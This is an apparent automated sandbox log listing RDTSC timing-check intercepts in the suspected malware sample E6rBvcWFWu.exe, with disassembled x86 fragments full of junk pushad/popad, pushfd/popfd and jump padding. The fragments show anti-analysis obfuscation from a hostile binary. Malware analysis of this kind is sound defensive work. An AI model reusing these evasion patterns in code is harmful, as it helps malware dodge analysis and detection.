Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743072D second address: 7430786 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F577C53EFD9h 0x0000000d add eax, 291780F6h 0x00000013 jmp 00007F577C53EFD1h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esi+24h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F577C53EFD8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430786 second address: 743078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743078C second address: 7430792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430792 second address: 7430796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430796 second address: 74307E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F577C53EFD1h 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F577C53EFD1h 0x0000001a xor cx, A516h 0x0000001f jmp 00007F577C53EFD1h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74307E0 second address: 74307E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743099A second address: 743099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743099E second address: 74309AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+18h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74309AE second address: 74309B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74309B4 second address: 74309CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74309CF second address: 74309F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C53EFCEh 0x00000009 or eax, 591D84E8h 0x0000000f jmp 00007F577C53EFCBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74309F5 second address: 7430A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+1Ch] 0x0000000a jmp 00007F577C5415D4h 0x0000000f mov dword ptr [esi+3Ch], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A1C second address: 7430A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A20 second address: 7430A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A24 second address: 7430A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A2A second address: 7430A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C5415D2h 0x00000009 sbb esi, 7DD659A8h 0x0000000f jmp 00007F577C5415CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F577C5415D8h 0x0000001b or eax, 605FCC08h 0x00000021 jmp 00007F577C5415CBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov eax, dword ptr [ebx+20h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A89 second address: 7430A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A8D second address: 7430A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A91 second address: 7430A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430A97 second address: 7430B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C5415D8h 0x00000009 sub esi, 0591C198h 0x0000000f jmp 00007F577C5415CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F577C5415D8h 0x0000001b sbb al, FFFFFFF8h 0x0000001e jmp 00007F577C5415CBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esi+40h], eax 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d pushfd 0x0000002e jmp 00007F577C5415D0h 0x00000033 and cx, C658h 0x00000038 jmp 00007F577C5415CBh 0x0000003d popfd 0x0000003e popad 0x0000003f lea eax, dword ptr [ebx+00000080h] 0x00000045 jmp 00007F577C5415D6h 0x0000004a push 00000001h 0x0000004c pushad 0x0000004d mov ecx, ebx 0x0000004f popad 0x00000050 push edx 0x00000051 jmp 00007F577C5415D4h 0x00000056 mov dword ptr [esp], eax 0x00000059 jmp 00007F577C5415D0h 0x0000005e lea eax, dword ptr [ebp-10h] 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B6C second address: 7430B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B72 second address: 7430B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B78 second address: 7430B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B7C second address: 7430B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B8B second address: 7430B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B8F second address: 7430B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B93 second address: 7430B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430B99 second address: 7430C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F577C5415CBh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F577C5415CBh 0x00000019 adc si, 029Eh 0x0000001e jmp 00007F577C5415D9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F577C5415D0h 0x0000002a sbb eax, 38B65498h 0x00000030 jmp 00007F577C5415CBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430C0A second address: 7430C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430CCA second address: 7430CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430CE5 second address: 7430D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F577C53EFCDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430D14 second address: 7430D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430E82 second address: 7430F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F577C53EFD8h 0x00000009 or cx, BC28h 0x0000000e jmp 00007F577C53EFCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test edi, edi 0x00000019 jmp 00007F577C53EFD5h 0x0000001e js 00007F57EC0AD7B6h 0x00000024 jmp 00007F577C53EFCEh 0x00000029 mov eax, dword ptr [ebp-04h] 0x0000002c jmp 00007F577C53EFD0h 0x00000031 mov dword ptr [esi+08h], eax 0x00000034 jmp 00007F577C53EFD0h 0x00000039 lea eax, dword ptr [ebx+70h] 0x0000003c pushad 0x0000003d movzx esi, dx 0x00000040 mov dh, B8h 0x00000042 popad 0x00000043 push 00000001h 0x00000045 jmp 00007F577C53EFD2h 0x0000004a nop 0x0000004b pushad 0x0000004c mov bx, cx 0x0000004f jmp 00007F577C53EFCAh 0x00000054 popad 0x00000055 push eax 0x00000056 jmp 00007F577C53EFCBh 0x0000005b nop 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f mov di, si 0x00000062 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430F44 second address: 7430FAC instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, 42EEh 0x0000000b popad 0x0000000c lea eax, dword ptr [ebp-18h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F577C5415CBh 0x00000016 jmp 00007F577C5415D3h 0x0000001b popfd 0x0000001c call 00007F577C5415D8h 0x00000021 pushad 0x00000022 popad 0x00000023 pop esi 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F577C5415D8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430FAC second address: 7430FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430FB0 second address: 7430FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430FC2 second address: 7430FD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430FD1 second address: 7430FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430FD7 second address: 7430FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7430FF7 second address: 743103B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C5415D3h 0x0000000b popad 0x0000000c mov edi, eax 0x0000000e pushad 0x0000000f mov ebx, esi 0x00000011 push esi 0x00000012 call 00007F577C5415D7h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 popad 0x0000001a test edi, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bh, 6Eh 0x00000021 push eax 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743103B second address: 74310E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C1h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F57EC0AD630h 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F577C53EFCFh 0x00000018 sub eax, 0690B93Eh 0x0000001e jmp 00007F577C53EFD9h 0x00000023 popfd 0x00000024 pop esi 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 mov eax, dword ptr [ebp-14h] 0x0000002c pushad 0x0000002d movzx esi, bx 0x00000030 mov bh, F3h 0x00000032 popad 0x00000033 mov ecx, esi 0x00000035 pushad 0x00000036 mov si, F46Fh 0x0000003a jmp 00007F577C53EFD4h 0x0000003f popad 0x00000040 mov dword ptr [esi+0Ch], eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov edi, 294EEAB0h 0x0000004b pushfd 0x0000004c jmp 00007F577C53EFD9h 0x00000051 xor ax, 0636h 0x00000056 jmp 00007F577C53EFD1h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74310E5 second address: 7431126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 770206ECh 0x0000000e jmp 00007F577C5415CEh 0x00000013 sub eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F577C5415D3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431126 second address: 7431143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431143 second address: 7431175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F577C5415D3h 0x00000015 mov dh, ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431175 second address: 743118A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743118A second address: 74311CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F577C5415CDh 0x0000000e test eax, eax 0x00000010 jmp 00007F577C5415CEh 0x00000015 jne 00007F57EC0AFAF2h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F577C5415D7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74311CF second address: 743122A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c jmp 00007F577C53EFCEh 0x00000011 mov eax, dword ptr [esi] 0x00000013 jmp 00007F577C53EFD0h 0x00000018 mov dword ptr [edx], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F577C53EFD7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743122A second address: 743129F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+04h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F577C5415D3h 0x00000015 sbb si, 3BCEh 0x0000001a jmp 00007F577C5415D9h 0x0000001f popfd 0x00000020 mov ah, B9h 0x00000022 popad 0x00000023 mov dword ptr [edx+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F577C5415D4h 0x0000002f adc cx, E778h 0x00000034 jmp 00007F577C5415CBh 0x00000039 popfd 0x0000003a mov dx, ax 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743129F second address: 74312CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b jmp 00007F577C53EFD8h 0x00000010 mov dword ptr [edx+08h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov si, dx 0x00000019 mov ecx, edi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74312CE second address: 7431315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c jmp 00007F577C5415D0h 0x00000011 mov dword ptr [edx+0Ch], eax 0x00000014 jmp 00007F577C5415D0h 0x00000019 mov eax, dword ptr [esi+10h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ecx, 3B1157E3h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431315 second address: 743137F instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov edx, esi 0x00000009 push ecx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [edx+10h], eax 0x00000010 jmp 00007F577C53EFD8h 0x00000015 mov eax, dword ptr [esi+14h] 0x00000018 jmp 00007F577C53EFD0h 0x0000001d mov dword ptr [edx+14h], eax 0x00000020 jmp 00007F577C53EFD0h 0x00000025 mov eax, dword ptr [esi+18h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F577C53EFD7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743137F second address: 74313F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ecx, 6ACA4C19h 0x00000013 jmp 00007F577C5415D6h 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007F577C5415D2h 0x0000001f and ecx, 21C414D8h 0x00000025 jmp 00007F577C5415CBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+1Ch] 0x0000002f pushad 0x00000030 mov cx, 75ABh 0x00000034 pushad 0x00000035 movzx esi, di 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74313F1 second address: 7431469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [edx+1Ch], eax 0x00000009 jmp 00007F577C53EFCFh 0x0000000e mov eax, dword ptr [esi+20h] 0x00000011 jmp 00007F577C53EFD6h 0x00000016 mov dword ptr [edx+20h], eax 0x00000019 pushad 0x0000001a movzx eax, di 0x0000001d call 00007F577C53EFD3h 0x00000022 mov bx, si 0x00000025 pop eax 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+24h] 0x0000002a jmp 00007F577C53EFCBh 0x0000002f mov dword ptr [edx+24h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F577C53EFD5h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431469 second address: 7431495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C5415D7h 0x00000008 mov ax, A1FFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edi, ax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431495 second address: 743149A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743149A second address: 74314D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007F577C5415D6h 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F577C5415CAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74314D7 second address: 74314DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74314DB second address: 74314E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74314E1 second address: 74314E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74314E7 second address: 74314EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431639 second address: 743165A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F57EC0AD08Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743165A second address: 743165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 743165E second address: 7431664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7431664 second address: 74316D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 pushfd 0x00000007 jmp 00007F577C5415CCh 0x0000000c adc ch, 00000038h 0x0000000f jmp 00007F577C5415CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or dword ptr [edx+38h], FFFFFFFFh 0x0000001c jmp 00007F577C5415D6h 0x00000021 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000025 pushad 0x00000026 jmp 00007F577C5415CEh 0x0000002b movzx eax, dx 0x0000002e popad 0x0000002f or dword ptr [edx+40h], FFFFFFFFh 0x00000033 pushad 0x00000034 mov esi, edi 0x00000036 movsx ebx, ax 0x00000039 popad 0x0000003a pop esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F577C5415CDh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 74316D5 second address: 74316DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7470C03 second address: 7470C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 7470C07 second address: 7470C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe RDTSC instruction interceptor: First address: 742079F second address: 74207A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
